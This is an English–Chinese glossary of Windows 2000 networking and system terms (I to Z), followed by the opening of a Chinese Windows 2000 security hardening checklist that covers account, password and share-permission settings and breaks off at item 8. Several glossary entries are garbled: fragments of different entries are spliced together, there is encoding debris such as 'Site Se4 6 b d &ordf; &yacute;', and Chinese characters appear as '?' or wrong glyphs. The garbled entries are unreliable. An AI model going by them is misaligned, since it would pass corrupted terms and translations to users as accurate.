infrared device --- 红外设备
infrared file transfer --- 红外文件传输
infrared network connection --- 红外网络连接
infrared port --- 红外端口
infrastructure master --- 基础结构主机?/A>
inheritance --- 继承
inherited permissions --- 继承权限
Initial master --- 初始主机?/A>
initialize --- 初始化
input locale --- 输入法区域设置
IME --- Input Method Editor --- 输入法
input/output (I/O) port --- 输入/输出端口
install --- 安装
integrated device electronics, IDE --- 集成设备电路
integrated local management interface, ILMI --- 集成本地管理接口
Integrated Services Digital Network, ISDN --- 综合业务数字网
interactive dialog box --- 交互式对话框
interactive logon --- 交互式登录
interconnect --- 相互连接
intermediary device --- 中间设备
internal network number --- 内部网络号
internal router --- 内部路由器
international prefix --- 国家(地区)电话前缀
International Telecommunication Union - Telecommunication (Standardization Sector), ITU-T --- 国际电信联盟 - 电信(标准化部分)
Internet
Internet address --- Internet 地址
Internet Authentication Service, IAS --- Internet 验证服务
Internet Control Message Protocol, ICMP --- 网际消息控制协议
Internet Engineering Task Force, IETF --- Internet 工程任务组
Internet Group Management Protocol, IGMP --- Internet 组管理协议
Internet group name --- Internet 组名
Internet Information Services, IIS --- Internet 信息服务
Internet Protocol, IP --- 网际协议
Internet Protocol multicasting --- 网际协议多播
Internet service provider, ISP --- Internet 服务提供商
Internetwork Packet Exchange, IPX --- 网间包交换
interrupt --- 中断
interrupt request, IRQ --- 中断请求
interrupt request (IRQ) lines --- 中断请求线
intersite messaging service,ISM --- 站间消息传递服务
IP, Internet Protocol --- 网际协议
IP address --- IP 地址
IP Address resource --- IP 地址资源
IP multicasting --- IP 多播
IPX, Internetwork Packet Exchange --- 网间包交换
IPX/SPX
IR, infrared --- 红外
IrDA, Infrared Data Association --- 红外数据联盟
IRQ (interrupt request) lines --- 中断请求线
ISDN, Integrated Services Digital Network --- 综合业务数字网
ISM, intersite messaging service --- 站间消息传递服务
ISP, Internet service provider --- Internet 服务提供商
iteration --- 循环
iterative query --- 循环查询
ITU-T, International Telecommunication Union - Telecommunication [Standardization Sector] --- 国际电信联盟 - 电信[标准化部分]
IXFR, incremental zone transfer --- 增量区域传送
J
journal queue --- 日志队列
journal quota --- 日志配额
junction point --- 交叉点
K
KDC, Key Distribution Center --- 密钥分发中心
Kerberos V5
key --- (注册表)项
Key Distribution Center, KDC --- 密钥分发中心
keyboard layout --- 键盘布局
L
L2TP, Layer 2 Tunneling Protocol --- 第二层隧道协议
label --- 标签
LAN, local area network --- 局域网
LAN emulation, LANE --- LAN 仿真
LAN emulation client, LEC --- LAN 仿真客户端
LAN emulation server, LES --- LAN 仿真服务器
LANE, LAN emulation --- LAN 仿真
LANE emulation configuration server, LECS --- LANE 仿真配置服务器
last known good configuration --- 上次已知的正确配置
latency --- 潜伏期
Layer 2 Tunneling Protocol, L2TP --- 第二层隧道协议
LDAP, Lightweight Directory Access Protocol --- 轻量级目录访问协议
LDAP Data Interchange Format, LDIF --- LDAP 数据交换格式
LDIF, LDAP Data Interchange Format --- LDAP 数据交换格式
lease --- 租用
LEC, LAN emulation client --- LAN 仿真客户端
LECS, LANE emulation configuration server --- LANE 仿真配置服务器
LES, LAN emulation server --- LAN 仿真服务器
library --- 库
Lightweight Directory Access Protocol, LDAP --- 轻量级目录访问协议
Line Printer Daemon, LPD --- 行式打印机程序
Line Printer Remote, LPR --- 行式打印机远程使用
link state database --- 链接状态数据库
linked object --- 链接的对象
LIS, logical IP subnet --- 逻辑 IP 子网
LMHOSTS file --- LMHOSTS 文件
load balancing --- 负载平衡
local account --- 本地帐户
local area network, LAN --- 局域网
local computer --- 本地计算机
local group --- 本地组
local printer --- 本地打印机
local service --- 本地服务
local storage --- 本地存储
local user profile --- 本地用户配置文件
LocalTalk --- 本地会话
location --- 位置
log file --- 日志文件
logical drive --- 逻辑驱动器
logical IP subnet, LIS --- 逻辑 IP 子网
logical printer --- 逻辑打印机
logon rights --- 登录权限
logon script --- 登录脚本
logon script path --- 登录脚本路径
logon workstations --- 登录工作站
long distance operator --- 长途接线员
long name --- 长文件名
loose name checking --- 宽限名称检查
LPD, Line Printer Daemon --- 行式打印机程序
LPR, Line Printer Remote --- 行式打印机远程使用
luminosity --- 发光度
M
MAC, Message Authentication Code --- 消息验证代码
MAC address --- MAC 地址
machine-centric --- 机器中心的
Macintosh-accessible volume --- Macintosh 可访问卷
Macintosh-style permissions --- Macintosh 风格的权限
MADCAP, Multicast Address Dynamic Client Allocation Protocol --- 多播地址动态客户端分配协议
Make Changes --- 进行更改
managed volume --- 被管理卷
Management and Monitoring Tools --- 管理和监视工具
Management Information Base, MIB --- 管理信息库
management system --- 管理系统
mandatory user profile --- 强制用户配置文件
MAPI, Messaging API --- 消息 API
MARS, multicast address resolution service --- 多播地址解析服务
master boot record, MBR --- 主引导记录
master domain --- 主域
Master File Table, MFT --- 主文件表
master server --- 主服务器
maximize --- 最大化
maximum password age --- 密码最长使用期
MBR, master boot record --- 主引导记录
MCS, multicast server --- 多播服务器
MD2
MD4
MD5, Message Digest Five --- 消息摘要 5
MDHCP, multicast DHCP --- 多播 DHCP
media --- 媒体
media access control address --- 媒体访问控制地址
media pool --- 媒体池
member server --- 成员服务器
memory address --- 内存地址
Memory Usage --- 内存使用
Memory Usage Delta --- 内存使用 Delta
message --- 消息
Message Authentication Code, MAC --- 消息身份验证代码
message digest --- 消息摘要
Message Digest Five, MD5 --- 消息摘要 5
Message Queuing --- 消息列队
Message Queuing resource --- 消息队列资源
Message Queuing server --- 消息队列服务器
Messaging API, MAPI --- 消息传递 API
Messenger service --- 信使服务
metric --- 跃点数
MFT, Master File Table --- 主文件表
MIB, Management Information Base --- 管理信息库
Microcom Networking Protocol Five, MNP5 --- Microcom 网络协议 5
Microcom Networking Protocol Four, MNP4 --- Microcom 网络协议 4
Microsoft Distributed Transaction Coordinator, MS DTC --- Microsoft 分布式事务协调器
Microsoft Management Console, MMC --- Microsoft 管理控制台
Microsoft Point-to-Point Encryption, MPPE --- Microsoft 点对点加密
MIDI, Musical Instrument Digital Interface --- 乐器数字接口
MIDI setup --- MIDI 安装程序
minimize --- 最小化
minimum password length --- 最小密码长度
minimum TTL --- 最小的 TTL
mirror --- 镜像
mirror set --- 镜像集
mirrored volume --- 镜像卷
mixed mode --- 混合模式
MMC, Microsoft Management Console --- Microsoft 管理控制台
MNP4, Microcom Networking Protocol Four --- Microcom 网络协议 4
MNP5, Microcom Networking Protocol Five --- Microcom 网络协议 5
modem --- 调制解调器
modem compression --- 调制解调器压缩
modulation standards --- 调制标准
mount --- 装入
mounted drive --- 已装入的驱动器
MPPE, Microsoft Point-to-Point Encryption --- Microsoft 点对点加密
MPR, MultiProtocol Routing --- 多协议路由
MS DTC, Microsoft Distributed Transaction Coordinator --- Microsoft 分布式事务协调器
MS-DOS
MS-CHAP ( Challenge Handshake Authentication Protocol) --- 质询握手验证协议
MS-DOS-based program --- 基于 MS-DOS 的程序
MSMQ
multibyte --- 多字节
Multicast Address Dynamic Client Allocation Protocol, MADCAP --- 多播地址动态客户端分配协议
multicast address resolution service, MARS --- 多播地址解析服务
multicast datagram --- 多播数据报
multicast DHCP, MDHCP --- 多播 DHCP
multicast media access control address --- 多播媒体访问控制地址
multicast scope --- 多播范围
multicast server, MCS --- 多播服务器
multicasting --- 多播
multihomed computer --- 多宿主计算机
multilink dialing --- 多链路拨号
multimaster replication --- 多主线复制
multimedia streaming --- 多媒体流
multiple boot --- 多重启动
MultiProtocol Routing, MPR --- 多协议路由
Musical Instrument Digital Interface, MIDI --- 乐器数字接口
My Documents --- 我的文档
N
name --- 名称
name mapping --- 名称映射
name resolution --- 名称解析
name server (NS) resourcdatagram --- 名称服务器资源记录
named pipe --- 命名管道
namespace --- 名称空间
naming context --- 命名上下文
naming service --- 命名服务
NAS, network access server --- 网络访问服务器
native mode --- 本机模式
NCP, NetWare Core Protocol --- NetWare 核心协议
NDIS, network driver interface specification --- 网络?动程序接口规范
NDS, Novell Directory Services --- Novell 目录服务
negative caching --- 相反缓存
NetBEUI, NetBIOS Enhanced User Interface --- NetBIOS 增强用户接口
NetBIOS, network basic input/output system --- 网络基本输入/输出系统
NetBIOS Enhanced User Interface, NetBEUI --- NetBIOS 增强用户接口
NetWare Core Protocol, NCP --- NetWare 核心协议
network access server, NAS --- 网络访问服务器
network adapter --- 网卡
network administrator --- 网络管理员
network basic input/output system, NetBIOS --- 网络基本输入/输出系统
network bridge --- 网桥
network card driver --- 网卡驱动程序
Network DDE service --- 网络 DDE 服务
network driver --- 网络驱动程序
network driver interface specification, NDIS --- 网络驱动程序接口规范
network file system, NFS --- 网络文件系统
network gateway --- 网关
network ID --- 网络 ID
Network Information Service, NIS --- 网络信息服务
network media --- 网络媒体
Network Name resource --- 网络名称资源
Network News Transfer Protocol, NNTP --- 网络新闻传输协议
network number --- 网络号
network partition --- 网络分区
network/bit-masked identifier --- 网络/位掩码标识符
network-to-network interface, NNI --- 网络对网络接口
NFS, network file system --- 网络文件系统
NIS, Network Information Service --- 网络信息服务
NNI, network-to-network interface --- 网络对网络接口
NNTP, Network News Transfer Protocol --- 网络新闻传输协议
node --- 节点
nonauthoritative restore --- 非强制性还原
noncontainer object --- 非容器对象
nonhubbed mode --- 非集中模式
nonpaged memory --- 未分页内存
nonpaged pool --- 未分页池
intrasitive trust --- 不可传递的信任
normal backup --- 普通备份
notify list --- 通知列表
Novell Directory Services, NDS --- Novell 目录服务
NS (name server) resource record --- 名称服务器源记录
nslookup
NTFS file system --- NTFS 文件系统
NTGATEWAY
null modem cable --- 零调制解调器电缆
NWLink
O
object --- 对象
object identifier --- 对象标识符
offline --- 脱机
OLE
on-disk catalog --- 磁盘目录
on-media catalog --- 媒体目录
one-way trust --- 单向信任
online --- 联机
Open Shortest Path First, OSPF --- 首先打开最短路径
Open Systems Interconnectionnpaged memory --- 式系统互连模型
OpenType fonts --- OpenType 字体
operations master --- 操作主机
operator --- 运算符
organizational unit --- 组织单位
orphan --- 孤儿
orphan file --- 孤立文件
OS/2
OSChooser
OSI, Open Systems Interconnection model --- 开放式系统互连模型
OSPF, Open Shortest Path First --- 最先打开最短路径
owner --- 所有者
owner category --- 所有者类别
P
p-node --- p 节点
package --- 程序包
packet --- 数据包
packet assembler/disassembler, PAD --- 分组拆装器
packet header --- 数据包报头
packet switching --- 数据包交换
PAD, packet assembler/disassembler --- 分组拆装程序
page fault --- 页错误
Page Faults Delta --- 页错误 Delta
paged pool --- 分页的池
paging file --- 页面文件
PAP, Password Authentication Protocol --- 密码身份验证协议
paper source --- 纸张来源
parent domain --- 父域
parent object --- 父对象
parenting --- 父处理
parity --- 奇偶校验
parity bit --- 奇偶校验位
partition --- 分区
partition boot sector --- 分区启动扇区
password --- 密码
Password Authentication Protocol, PAP --- 密码身份验证协议
paused --- 已暂停
PBX, Private Branch Exchange --- 专用分交机交换
PC Card --- PC 卡
PCL, Printer Control Language --- 打印机控制语言
PDC, primary domain controller --- 主域控制器
PDC emulator master --- PDC 模拟主机
Peak Memory Usage --- 高峰内存使用
pel
pending --- 挂起
Per Seat Licensing --- 每客户授权
Per Server Licensing --- 每服务器授权
performance alert --- 性能警报
performance counter --- 性能计数器
performance object --- 性能对象
performance object instance --- 性能对象实例
permanent virange --- rcuit, PVC --- 永久虚电路
permission --- 权限
Physical Disk resource --- 物理盘资源
PID, process identifier --- 进程标识符
PIF, program information file --- 程序信息文件
ping
pixel --- 像素
PJL, Printer Job Language --- 打印机作业语言
PKCS, Public Key Cryptography Standards --- 公钥密码系统标准
PKCS #7
PKCS #10
PKCS #12
PKI, public key infrastructure --- 公钥基础结构
plotter font --- 绘图仪字体
Plug and Play --- 即插即用
PNNI, private or public network-to-network interface --- 专用或公用网络到网络接口
point of presence, POP --- 存在点
point of termination station, POTS --- 终端站点
Point-to-Point Protocol, PPP --- 点对点协议
Point-to-Point Tunneling Protocol, PPTP --- 点对点隧道协议
pointer (PTR) resource record --- 指针 (PTR) 资源纪录
poison reverse --- 有损反转
policy --- 策略
polling intervals --- 轮询间隔
POP, point of presence --- 存在点
port --- 端口
port ID --- 端口 ID
port rule --- 端口规则
POSIX
possible owners --- 可能的所有者
PostScript
PostScript fonts --- PostScript 字体
PostScript printer --- PostScript 打印机
POTS, point of termination station --- 终站点
power conditioning --- 电源调节
PPP, Point-to-Point Protocol --- 点对点协议
ferred owner --- 首选所有者
primary group --- 主要组
primary master --- 主要主机
primary partition --- 主分区
print job --- 打印作业
print processor --- 打印处理器
print server --- 打印服务器
Print Server for Macintosh --- Macintosh 打印服务器
print spooler --- 打印后台处理程序
Print Spooler resource --- 打印后台处理程序资源
printer --- 打印机
Printer Control Language, PCL --- 打印机控制语言
printer driver --- 打印机驱动程序
printer fonts --- 打印机字体
Printer Job Language, PJL --- 打印机作业语言
printer permissions --- 打印机权限
Printer window --- 打印机窗口
Printers --- 打印机
printing pool --- 打印池
Private Branch Exchange, PBX --- 专用分机交换
private key --- 私钥
private network --- 专用网络
private or publn configuration server --- LANE e, PNNI --- 专用或公用网络到网络接口
private queue --- 专用队列
private volume --- 专用卷
privileges --- 特权
process identifier, PID --- 进程标识符
program --- 程序
program information file, PIF --- 程序信息文件
property --- 属性
property cache --- 属性缓存
protocol parser --- 协议分析程序
PSTN, Public Switched Telephone Network --- 公共电话交换网络
PTR (pointer) resource record --- PTR(指针)资源纪录
public key --- 公钥
public key cryptography --- 公钥密码系统
Public Key Cryptography Standards, PKCS --- 公钥密码系统标准
public , LANE --- LAN n --- 公钥加密
public key infrastructure, PKI --- 公钥基础结构
public network --- 公共网络
public queue --- 公用队列
Public Switched Telephone Network, PSTN --- 公共电话交换网络
pull partner --- 拉伙伴
pulse dialing --- 脉冲拨号
push partner --- 推伙伴
PVC, permanent virtual circuit --- 永?虚电路
Q
QoS, Quality of Service --- 服务质量
QoS Admission Control Service --- QoS 许可控制服务
Quality of Service, QoS --- 服务质量
query --- 查询
queue --- 队列
queue quota --- 队列配额
queue type ID --- 队列类型 ID
quiet answer --- 静音应答
quorum log --- 仲裁日志
quorum resource --- 仲裁资源
quota on --- --- 配额限制
R
RADIUS, Remote Authentication Dial-In User Service --- 远程身份验证拨入用户服务
RAID, Redundant Array of Independent Disks --- 独立磁盘冗余阵列
RAID-5 volume --- RAID-5 卷
RAM, random-access memory --- 随机访问内存
random-access memory, RAM --- 随机访问内存
raster fonts --- 光栅字体
read-only memory, ROM --- 只读内存
Real-Time Transport Protocol, RTP --- 实时传输协议
realm --- 领域
realm name --- 领域名
rebinding state --- 重新绑定状态
reconciliation --- 会合
recoverable message --- 可恢复的信息
recovery agent --- 故障恢复代理
Recovery Console --- 故障恢复控制台
recursion --- 递归
recursive query --- 递归查询
Recycle Bin --- 回收站
reduced instruction set computing, RISC --- 精简指令集计算
Redundant Array of Independent Disks, RAID --- 独立磁盘冗余阵列
referral --- 备用
referral server --- 备用服务器
refresh --- 刷新
refresh interval --- 刷新间隔
refresh rate --- 刷新速度
region --- 区?
registered file type --- 已注册文件类型
registry --- 注册表
registry boot --- 注册表启动
registry size limit, RSL --- 注册表大小限制
relative distinguished name --- 相对辨别名称
relative ID --- 相对 ID
relative ID master --- 相对 ID 主机
relative name --- 相对名称
remote access --- 远程访问
remote acceM adaptation layer --- ATM te administration --- 远程管理
Remote Authentication Dial-In User Service, RADIUS --- 远程身份验证拨入用户服务
remote computer --- 远程计算机
Remote Installation Services --- 远程安装服务
remote procedure call, RPC --- 远程过程调用
remote storage --- 远程存储
Remote Storage --- 远程存储
removable media --- 可移动媒体
Removable Storage --- 可移动存储
rendering intent --- 调整颜色
rendezvous --- 集合点
replica --- 副本
replica set --- 副本集
replication --- 副本
replication policy --- 副本策略
replication topology --- 副本拓扑
report message --- 报告消息
report queue --- 报告队列
Request for Comments, RFC --- 注释请求
required callback --- 必需回叫
reservation --- 保留
resolver --- 解析程序
resource --- 资源
resource allocation --- 资源分配
Resource DLL --- 资源 DLL
resource domain --- 资源域
resource fork --- 资源派生
Resource Monitor --- 资源监视器
resource record, RR --- 资源记訓
resource record set, RRset --- 资源记录集
Resource Reservation Protocol, RSVP --- 资源保护协议
resource types --- 资源类型
response --- 响应
response message --- 响应消息
response queue --- 响应队列
retry interval --- 重试间隔
reverse lookup --- 反向搜索
RFC, Request for Comments --- 注释请求
RGB color space --- RGB 颜色区
RIPX, Routing Information Protocol over IPX --- 在 IPX 上的路由信息协议
RISC, reduced instruction set computing --- 精简指令集计算
roaming user profile --- 漫游用户配置文件
ROM, read-only memory --- 只读内存
root --- 根
root authority --- 根颁发机构
root certificate --- 根证书
root hints --- 根提示
root servers --- 根服务器
round robin --- 循环提示器
Routemon utility --- Routemon 实用程序
router --- 路由器
routing --- 路由
Routing Information Protocol over IPX, RIPX --- 在 IPX 上的路由信息协议
routing link --- 路由链接
routing-link cost --- 路由链接成本
routing protocol --- 路由协议
routing services --- 路由服务
RPC, remote procedure call --- 远程过程调用
RR, resource record --- 资源记录
Rrset, resource record set --- 资源记录集
RS-232-C standard --- RS-232-C 标准
RSA
RSL, registry size limit --- 注册表大小限制
RSVP, Resource Reservation Protocol --- 资源保留协议
RTP, Rea --- ime Transport Protocol --- 实时传输协议
S
S/MIME, Secure Multipurpose Internet Mail Extensions --- 安全多用途网际邮件扩展协议
SACL, system access control list --- 系统访问控制列表
safe mode --- 安全模式
safe mode with command prompt --- 命令提示符下的安全模式
safe mode with networking --- 联网安全模式
SAM, security account manager --- 安全帐户管理器
SAM account name --- SAM 帐户名
saturation --- 饱和度
SBM, subnet bandwidth management --- 子网带宽管理
scalability --- 可伸缩性
scavenging --- 清理
schema --- 架构
schema master --- 架构主机
scope --- 作用域
scope of influence --- 影响的作用域
screen fonts --- 屏幕字体
screen resolution --- 屏幕分辨率
screen saver --- 屏幕保护程序
SCSI, small computer system interface --- 小型计算机系统接口
SDP, Standard Description Protocol --- 标准描述协议
second-level domains --- 二级域
secondary master --- 辅助主机
secret key encryption --- 密钥加密
sector --- 扇区
Secure Hash Algorithm, SHA-1 --- 安全散列算法
Secure Multipurpose Internet Mail Extensions, S/MIME --- 安全多用途网际邮件扩展协议
Secure Sockets Layer, SSL --- 安全套接字层
security --- 安全性
security account manager,SAM --- 安全帐户管理器
security descriptor --- 安全描述
security group --- 安全组
security host --- 安全主机
security ID,SID --- 安全 ID
security identifier --- 安全标识符
security log --- 安全日志
security principal --- 安全主体
security principal name --- 安全主体名称
See Files --- 查看文件
See Folders --- 查看文件夹
seed router --- 种子路由器
Serial Line Internet Protocol, SLIP --- 串行线路网际协议
serial port --- 串行端口
server --- 服务器
server application --- 服务器应用程序
server cluster --- 服务器群集
server zone --- 服务器区域
service --- 服务
Service Profile Identifier, SPID --- 服务配置文件标识符
service (SRV) resource record --- 服务 (SRV) 资源记录
service ticket --- 服务票据
Services for Macintosh (now called AppleTalk network integration) --- Macintosh 服务(现在称为 AppleTalk 网络集成)
session --- 会话
session concentration --- 会话集中度
set-by-caller callback --- 由呼叫者设置的回叫
SHA-1, Secure Hash Algorithm --- 安全散列算法
share --- 共享
shared folder --- 共享文件夹
shared folder permissions --- 共享文件夹权限
shared network directory --- 共享网络目录
shared printer --- 共享打印机
shared resource --- 共享资源
short name --- 短名称
shortcut --- 快捷方式
SID, security ID --- 安全 ID
signaling protocol --- 信号协议
signature PKI --- 签名 PKI
Simple Mail Transfer Protocol, SMTP --- 简单邮件传输协议
Simple Network Management Protocol, SNMP --- 简单网络管理协议
Simple TCP/IP Services --- 简单 TCP/IP 服务
simple volume --- 简单卷
Single Instance Store, SIS --- 零备份存储
single sign-on --- 单一登录
SIS, Single Instance Store --- 零备份存储
site --- 站点
Site Se4 6 b d &ordf; &yacute; 站点服务器 ILS 服务
SLIP, Serial Line Internet Protocol --- 串行线路网际协议
small computer system interface, SCSI --- 小型计算机系统接口
smart card --- 智能卡
smart card reader --- 智能卡读取器
SMTP, Simple Mail Transfer Protocol --- 简单邮件传输协议
snap-in --- 管理单元
SNMP, Simple Network Management Protocol --- 简单网络管理协议
SOA (start-of-authority) resource record --- SOA(颁发机构开始)资源记录
software decoder --- 软件解码器
source Document --- 源文档
source journaling --- 源日志
spanned volume --- 跨区卷
sparse file --- 稀疏文件
special access permissions --- 特殊访问权限
SPID, Service Profile Identifier --- 服务配置文件标识符
split horizon --- 水平拆分
splitting --- 拆分
spooler --- 后台打印程序
spooling --- 后台打印
SRV (service) resource record --- SRV(服务)资源记录
SSL, Secure Sockets Layer --- 安全套接字层
stand-alone server --- 独立服务器
Standard Description Protocol, SDP --- 标准描述协议
start-of-authority (SOA) resource record --- 颁发机构开始 (SOA) 资源记录
startup environment --- 启动环境
static dialog box --- 静态对话框
static load balancing --- 静态负载平衡
static routes --- 静态路由
status area --- 状态区域
status bar --- 状态栏
STOP error --- STOP 错误
storage-class resource --- 存储类资源
strict RFC checking --- 严格的 RFC 检查
string --- 字符串
stripe set --- 带区集
stripe set with parity --- 带有奇偶校验的带区集
striped volume --- 带区卷
subdomain --- 子域
subkey --- 子项
subnet bandwidth management, SBM --- 子网带宽管理
subtree --- 子树
superscope --- 超级作用域
SVC, switched virtual circuit --- 交换虚电路
swap file --- 交换文件
switch type --- 交换类型
switched circuit --- 交换电路
switched virtual circuit, SVC --- 交换虚电路
switching hub --- 交换集线器
symmetric encryption --- 对称加密
system access control list, SACL --- 系统访问控制列表
system default profile d driver ---
system disk --- 系统盘
system files --- 系统文件
System menu --- 系统菜单
system partition --- 系统分区
system policy --- 系统策略
system queue --- 系统队列
System State --- 系统状态
system variables --- 系统变量
system volume --- 系统卷
systemroot --- 系统根
Systems Management Server --- 系统管桨服务器
SYSVOL
T
T.120
tag --- 标记
TAPI, Telephony API --- 电话 API
target journaling --- 目标日志
taskbar --- 任务栏
taskbar button --- 任务栏按钮
TCP/IP, Transmission Control Protocol/Internet Protocol --- 传输控制协议/网际协议
Telephony API, TAPI --- 电话 API
telephony switch --- 电话交换
Terminal Services --- 终端服务
Terminal Services Licensing --- 终端服务授权
terminate-and-stay-resident (TSR) program --- 终止并驻留内存 (TSR) 程序
test queue --- 测试队列
text box --- 文本框
TFTP, Trivial File Transfer Protocol --- 简单文件传输协议
TGS, ticket-granting service --- 票据授予服务
TGT, ticket-granting ticket --- 票据授予票据
Thread Count --- 线程数
thumbnail --- 缩略图
ticket --- 票据
ticket-granting service, TGS --- 票据授予服务
ticket-granting ticket, TGT --- 票据授予票据
time slice --- 时间片
time stamp --- 时间戳
time-out error --- 超时错误
Time-To-Live, TTL --- 活动时间
title bar --- 标题鯅
TLS, Transport Layer Security --- 传输层安全
top-level domains --- 顶级域
topological database --- 拓扑数据库
topology --- 拓扑
touch-tone dialing --- 按键式拨号
trace log --- 追踪日志
transaction --- 事务处理
transaction dead-letter queue --- 事务处理死信队列
transactional message --- 事务处理消息
transitive trust --- 可传递信任
Transmission Control Protocol/Internet Protocol, TCP/IP --- 传输控制协议/网际协议
transmitting station ID (TSID) string --- 传输站 ID (TSID) 字符串
Transport Layer Security, TLS --- 传输层安全
trap --- 陷阱
tree view --- 树视图
triggered update --- 触发更新
Trivial File Transfer Protocol, TFTP --- 简单文件传输协议
Trojan horse --- 特洛伊木马
TrueType fonts --- TrueType 字体
trust relationship --- 信任关系
TSID (transmitting station ID) string --- 传输站 ID 字符串
TSR (terminate-and-stay-resident) program --- 终止并驻留内存程序
TTL, Time-To-Live --- 生存时间
tunnel --- 隧道
tunnel server --- 隧道服务器
two-way trust --- 双向信任
Type 1 fonts --- Type 1 字体
U
UAM, user authentication module --- 用户身份验证模块
UBR, unspecified bit rate --- 未指定的传输率
UCS, Unicode Character System --- Unicode 字符系统
UDP, User Datagram Protocol --- 用户数据报协议
unallocatelimit --- / 未分配的空间
UNC (Universal Naming Convention) name --- 通用命名规则名称
UNI, user network interface --- 用户网络接口
unicast --- 单播
Unicode
Unicode Character System, UCS --- Unicode 字符系统
Unicode Transmission Format 8, UTF-8 --- Unicode 传输格式 8
uninstall --- 卸载
universal group --- 通用组
Universal Naming Convention (UNC) name --- 通用命名规则名称
universal serial bus, USB --- 通用串行总线
unspecified bit rate, UBR --- 未指定的传输率
upcasing --- 大写转换
upgrade --- 升级
UPS, uninterruptible power supply --- 不间断电源
UPS service --- UPS 服务
USB, universal serial bus --- 通用串行总线
user account --- 用户帐户
user authentication module, UAM --- 用户身份验证模块
user class --- 用户类
User Datagram Protocol, UDP --- 用户数据报协议
user name --- 用户名
user network interface, UNI --- 用户网络接口
USER object --- USER 对象
user password --- 用户密码
user principal name --- 用户主体名称
user principal name suffix --- 用户主体名称后缀
user profile --- 用户配置文件
user rights --- 用户权限
user rights policy --- 用户权限策略
Users --- 用户
UTF-8, Unicode Transmission Format 8 --- Unicode 传输格式 8
V
V.34
V.90
validation --- 验证
value entry --- 值项
variable --- 变量
variable bit rate, VBR --- 可变传输率
VBR, variable bit rate --- 可变传输率
VCI, virtual channel identifier --- 虚拟信道标识符
VDM, virtual DOS machine --- 虚拟 DOS 机
vector --- 矢量
vector fonts --- 矢量字体
vendor class --- 供应商类别
video codec --- 视频解码
virtual channel identifier, VCI --- 虚拟信道标识符
virtual container --- 虚拟容器
virtual DOS machine --- 虚拟 DOS 机器(VDM)
virtual IP address --- 虚拟 IP 地址
virtual link --- 虚拟链接
virtual local area network, VLAN --- 虚拟局域网
virtual memory --- 虚拟内存
Virtual Memory Size --- 虚拟内存大菆
virtual network --- 虚拟网络
virtual path identifier, VPI --- 虚拟路径标识符
virtual printer memory --- 虚拟打印机内存
virtual private network, VPN --- 虚拟专用网络
virtual server --- 虚拟服务器
virus --- 病毒
VLAN, virtual local area network --- 虚拟局域网
VoIP, Voice over Internet Protocol --- 通过 IP 协议的语音
volume --- 卷
volume password --- 卷密码
volume set --- 卷集
voluntary tunnel --- 自主隧道
VPI, virtual path identifier --- 虚拟路径标识符
virtual private network, VPN --- 虚拟专用网络
W
Waiting for Call --- 等待呼叫
wallpaper --- 墙纸
WAN, wide area network --- 广域网
well-connected --- 连接良好
well-known services --- 公认的服务
wide area network, WAN --- 广域网
wildcard character --- 通配符
wildcarding --- 通配符方式
window menu --- 窗口菜单
Windows 2000 Server File and Print Servers for Macintosh --- Windows 2000 Server 的 Macintosh 文件与打印服务器
Windows 2000 Task Manager --- Windows 2000 任务管理器
Windows Internet Name Service, WINS --- Windows Internet 命名服务
Windows Management Instrumentation, WMI --- Windows 管理规范
Windows Media Services --- Windows Media 服务
WINS, Windows Internet Name Service --- Windows Internet 命名服务
WINS proxy --- WINS 代理
WINS resource --- WINS 资源
Winsock
wireless communication --- 无线通讯
WMI, Windows Management Instrumentation --- Windows 管理规范
workgroup --- 工作组
X
X.500
X.509v3 certificate --- X.509/ 证书
XOR, exclusive OR --- 异或
Y
无词汇表项
Z
zone --- 区域
zone list --- 区域列表
zone transfer --- 区域传送
Windows 2000 安全检查清单
前段时间,中美网络大战,我看了一些被黑的服务器,发现绝大部分被黑的服务器都是Nt/win2000的机器,真是惨不忍睹。Windows2000 真的那么不安全么?其实,Windows2000 含有很多的安全功能和选项,如果你合理的配置它们,那么windows 2000将会是一个很安全的操作系统.我抽空翻了一些网站,翻译加凑数的整理了一篇checklist出来。希望对win2000管理员有些帮助。本文并没有什么高深的东西,所谓的清单,也并不完善,很多东西要等以后慢慢加了,希望能给管理员作一参考。
具体清单如下:
初级安全篇
1.物理安全
服务器应该安放在安装了监视器的隔离房间内,并且监视器要保留15天以上的摄像记录。另外,机箱,键盘,电脑桌抽屉要上锁,以确保旁人即使进入房间也无法使用电脑,钥匙要放在另外的安全的地方。
2.停掉Guest 帐号
在计算机管理的用户里面把guest帐号停用掉,任何时候都不允许guest帐号登陆系统。为了保险起见,最好给guest 加一个复杂的密码,你可以打开记事本,在里面输入一串包含特殊字符,数字,字母的长字符串,然后把它作为guest帐号的密码拷进去。
3.限制不必要的用户数量
去掉所有的duplicate user 帐户, 测试用帐户, 共享帐号,普通部门帐号等等。用户组策略设置相应权限,并且经常检查系统的帐户,删除已经不在使用的帐户。这些帐户很多时候都是黑客们入侵系统的突破口,系统的帐户越多,黑客们得到合法用户的权限可能性一般也就越大。国内的nt/2000主机,如果系统帐户超过10个,一般都能找出一两个弱口令帐户。我曾经发现一台主机197个帐户中竟然有180个帐号都是弱口令帐户。
4.创建2个管理员用帐号
虽然这点看上去和上面这点有些矛盾,但事实上是服从上面的规则的。 创建一个一般权限帐号用来收信以及处理一些日常事物,另一个拥有Administrators 权限的帐户只在需要的时候使用。可以让管理员使用 “ RunAS” 命令来执行一些需要特权才能作的一些工作,以方便管理。
5.把系统administrator帐号改名
大家都知道,windows 2000 的administrator帐号是不能被停用的,这意味着别人可以一遍又一边的尝试这个帐户的密码。把Administrator帐户改名可以有效的防止这一点。当然,请不要使用Admin之类的名字,改了等于没改,尽量把它伪装成普通用户,比如改成:guestone 。
6.创建一个陷阱帐号
什么是陷阱帐号? Look!>创建一个名为” Administrator”的本地帐户,把它的权限设置成最低,什么事也干不了的那种,并且加上一个超过10位的超级复杂密码。这样可以让那些 Scripts s忙上一段时间了,并且可以借此发现它们的入侵企图。或者在它的login scripts上面做点手脚。嘿嘿,够损!
7.把共享文件的权限从”everyone”组改成“授权用户”
“everyone” 在win2000中意味着任何有权进入你的网络的用户都能够获得这些共享资料。任何时候都不要把共享文件的用户设置成”everyone”组。包括打印共享,默认的属性就是”everyone”组的,一定不要忘了改。
8.使用安全密码
